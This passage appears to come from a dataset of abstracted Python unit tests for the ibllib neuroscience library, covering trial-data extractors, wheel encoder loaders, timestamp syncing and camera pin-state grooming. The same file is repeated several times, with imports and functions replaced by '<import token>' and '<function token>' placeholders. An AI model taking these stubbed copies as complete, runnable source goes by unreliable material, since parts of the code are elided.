pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = 